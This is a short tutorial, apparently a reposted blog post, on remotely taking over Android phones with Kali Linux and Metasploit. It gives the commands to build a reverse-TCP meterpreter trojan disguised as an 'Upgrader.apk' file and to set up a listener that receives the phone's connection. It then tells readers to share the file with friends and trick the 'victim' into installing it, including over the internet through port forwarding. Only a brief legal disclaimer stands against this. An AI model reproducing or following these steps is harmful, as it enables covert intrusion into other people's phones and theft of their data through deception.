How to Hack Android Phones – Using Kali (remotely)
As the number of mobile phone users sky rockets, so are the number of people who use Android devices (unsurprisingly), however, due to the increased popularity in android devices, newer vulnerabilities and methods have been found and even made. In this tutorial we will discuss an up to date method on just how to do this quick, properly and even remotely, potentially without being noticed. Whether or not you are trying this on your phone or someone else’s, please note that we hold no responsibility for the actions that you yourself decide to take, as it is illegal to do this to someones phone without consent. with all that said, you are going to need a few things to try this method…
Method 1 – Reverse TCP payload:
- Step 1: Fire-Up Kali:
- Open a terminal, and make a Trojan .apk
- You can do this by typing :
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding. - Step 2: Open Another Terminal:
- Open another terminal until the file is being produced.
- Load metasploit console, by typing : msfconsole
- Step 3: Set-Up a Listener:
- After it loads (it will take a minute), load the multi-handler exploit by typing : use exploit/multi/handler
- Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
- To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
- Step 4: Lets Exploit!
- At last type: exploit to start the listener.
- Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
- Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
- Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
- Let the Victim install the Upgrader app (as they would more than likely think it is meant to upgrade some features on their phone)
- However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
- And when they click Open…
- Step 5: HACKED!
There comes the meterpreter prompt:
For more information on exploits like these, or for a slightly different method of Android hacking (if the above method does not work for you), refer to the link – http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.V2A386id.KokNLphX.dpbs
The post How to Hack Android Phones – Using Kali (remotely) appeared first on Activist News Australia.